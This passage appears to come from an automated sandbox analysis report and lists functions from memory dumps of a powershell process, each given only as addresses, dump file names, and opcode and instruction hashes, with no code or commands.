                                                                  • Opcode ID: ab2437607b149c87970ab51c07a443a0671dffa7ce9343a3181fdffa079d5e81
                                                                  • Instruction ID: 228cb435649a159628fc0574404c08ce806cd54b25889039a6b3c7da6e6227e0
                                                                  • Opcode Fuzzy Hash: ab2437607b149c87970ab51c07a443a0671dffa7ce9343a3181fdffa079d5e81
                                                                  • Instruction Fuzzy Hash: C3F0A4766043542BD7225B7890143EB3BA6CF82774F1041AAD4058B386CE3A5986C7D5
                                                                  Function 0263D8D3 Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1849796020.000000000263D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_263d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ff05a1d527fecbe90a9dbf02dd84e985a720349df31dbe1b40f23d5b44c4d7e
                                                                  • Instruction ID: 1ec6bcf6b92a03b9a495d2304f1bba3ada0e1df76dcb2ee54b515822d6161a20
                                                                  • Opcode Fuzzy Hash: 5ff05a1d527fecbe90a9dbf02dd84e985a720349df31dbe1b40f23d5b44c4d7e
                                                                  • Instruction Fuzzy Hash: 87F0E776200600AF97258F0AD984C23FBADEBD4770319C56AE84A4B666C671EC42CAA0
                                                                  Function 027392EF Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fff20fd17b01edb86455c4aaea27a4372a7ec09f8f7de0ccc3b320ffe52e11d1
                                                                  • Instruction ID: ae41199ba8706ebf75b9406f46415778ce0ca7a69d8461d62a6e0cb444b7498a
                                                                  • Opcode Fuzzy Hash: fff20fd17b01edb86455c4aaea27a4372a7ec09f8f7de0ccc3b320ffe52e11d1
                                                                  • Instruction Fuzzy Hash: 79F09A705053509FC7619F78D09839ABFE5EB06310F0400AED14ECB282DB395841CB96
                                                                  Function 0263D8C4 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1849796020.000000000263D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_263d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fefb8c5159626c1d111187e30eabcc2dadd76bb0727f74a3aa03b39f9150cb0a
                                                                  • Instruction ID: 13a99cb00070df044c2a479f24ef0c8ab4e74a7f0902bf5b402ecbfa7ad0eaa3
                                                                  • Opcode Fuzzy Hash: fefb8c5159626c1d111187e30eabcc2dadd76bb0727f74a3aa03b39f9150cb0a
                                                                  • Instruction Fuzzy Hash: 79F0E775100680AFD7258F06C984D22BBA9EB85624B198499A84A5B362C631FC42CB60
                                                                  Function 02739280 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba4d1d54bc99e8fe5ec984295bc34fce45941a7c70eddb30c9f0c54c1d9ce3b0
                                                                  • Instruction ID: 75f4caaddd9399d42c33dd658387bf4deeff4de6755aa87bc25b0d12fc5a0951
                                                                  • Opcode Fuzzy Hash: ba4d1d54bc99e8fe5ec984295bc34fce45941a7c70eddb30c9f0c54c1d9ce3b0
                                                                  • Instruction Fuzzy Hash: 00F027716006081BE3116B68D0183AF77ABDFC0768F1041BDD5094B385CF3D2946CBD5
                                                                  Function 0273E3F0 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72d3a195bb79bb2ee16927be5c4b2fc1655c383e3a0578a7020713ca874c3e47
                                                                  • Instruction ID: 6a72c476f1ea213b03e11d81dc2c748e2d2979a1e4ef3d1464d488b9edf4c5b0
                                                                  • Opcode Fuzzy Hash: 72d3a195bb79bb2ee16927be5c4b2fc1655c383e3a0578a7020713ca874c3e47
                                                                  • Instruction Fuzzy Hash: 44E06D353002108F86009B1DD444C2AB7EAEFCE62532500AAF649DB321CB21EC028B90
                                                                  Function 0273C270 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d04dfa8bf3347c74fb3ecb667b4ee09e3efd4d44fcbd89cc03cb6c8dbda4586
                                                                  • Instruction ID: 47021d7da93e6a4010828d2360706208f68ff5c4cf4ceef41d041807775b52fa
                                                                  • Opcode Fuzzy Hash: 8d04dfa8bf3347c74fb3ecb667b4ee09e3efd4d44fcbd89cc03cb6c8dbda4586
                                                                  • Instruction Fuzzy Hash: 36E0C2A220E3506B972606A998115A33FDCAA028A074440DFE448D7583D901E40483E2
                                                                  Function 02739300 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 49e4ddf4bd1eac0f5b5793ed6680a41b93846aa18501682df7893b8e47e198d9
                                                                  • Instruction ID: fcb8fabec3e7cd121e22839bf1a2fc589e9e6dd181a97e10adc393105983feee
                                                                  • Opcode Fuzzy Hash: 49e4ddf4bd1eac0f5b5793ed6680a41b93846aa18501682df7893b8e47e198d9
                                                                  • Instruction Fuzzy Hash: 66F06570A003049BD3609FB8E0983AABBEAEB44320F00046DE14ED3380EF39A8408B94
                                                                  Function 0273E240 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c5d425383c8aad0a7d5b6280d72fe99af2b6a45d8b12545e5c50701e244512bd
                                                                  • Instruction ID: 4a2dc23b3024a198548ea2b7a139c2fbd657353b90567a45656a9060c0bdedf7
                                                                  • Opcode Fuzzy Hash: c5d425383c8aad0a7d5b6280d72fe99af2b6a45d8b12545e5c50701e244512bd
                                                                  • Instruction Fuzzy Hash: 2BE0C231740A140BC222A66EA91085FB7DBEFC5661350403EE029C7344DFA5DC0647E9
                                                                  Function 0273E290 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1850439989.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_2730000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                  • Instruction ID: 5f4984a3137b11c059240616d6abb9d29ea956ee197aff211e710a273a54d49b
                                                                  • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                  • Instruction Fuzzy Hash: 2DE08632B00118978B089599D4104D9F7A5DFCC220F04847AD90AA7341DA726916C691